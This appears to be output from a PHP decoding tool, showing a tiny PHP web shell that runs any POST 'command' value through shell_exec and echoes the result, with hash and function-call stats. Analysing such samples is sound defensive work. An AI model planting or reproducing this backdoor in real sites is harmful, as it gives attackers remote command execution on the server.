Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (isset($_POST['command'])) { $output = shell_exec($_POST['command']..
Decoded Output download
<?php
if (isset($_POST['command'])) {
$output = shell_exec($_POST['command']);
echo $output;
}
?>
Did this file decode correctly?
Original Code
<?php
if (isset($_POST['command'])) {
$output = shell_exec($_POST['command']);
echo $output;
}
?>
Function Calls
shell_exec | 1 |
Stats
MD5 | 12166cae6fb26d165da69ceeda63065f |
Eval Count | 0 |
Decode Time | 64 ms |